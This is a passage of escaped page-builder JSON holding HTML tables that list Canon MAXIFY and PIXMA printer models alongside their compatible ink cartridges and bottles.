width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td 